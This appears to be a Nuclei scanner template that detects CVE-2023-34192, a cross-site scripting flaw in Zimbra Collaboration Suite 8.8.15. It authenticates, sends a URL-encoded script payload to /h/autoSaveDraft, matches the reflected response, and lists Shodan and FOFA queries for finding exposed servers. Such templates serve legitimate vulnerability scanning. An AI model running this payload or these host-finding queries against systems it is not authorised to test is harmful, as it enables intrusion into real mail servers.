id: CVE-2023-34192 info: name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting author: ritikchaddha severity: critical description: | Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192 - https://wiki.zimbra.com/wiki/Security_Center - https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H cvss-score: 9 cve-id: CVE-2023-34192 cwe-id: CWE-79 epss-score: 0.28331 epss-percentile: 0.9632 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 2 vendor: zimbra product: collaboration shodan-query: http.favicon.hash:475145467 fofa-query: icon_hash="475145467" tags: cve,cve2023,zimbra,xss,authenticated http: - raw: - | POST /zimbra/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded loginOp=login&username={{username}}&password={{password}}&client=preferred - | GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body_2 words: - "" - "zimbra" condition: and - type: word part: header_2 words: - text/html - type: status part: header_2 status: - 200 # digest: 490a00463044022070125ffe54429c7774d0c7acb5cf5510141e93248379650f336c59a29cbe6465022042f357f312369108fcb1852640775db8dd155bc86b799483dfcc727f4e3684db:922c64590222798bb761d5b6d8e72950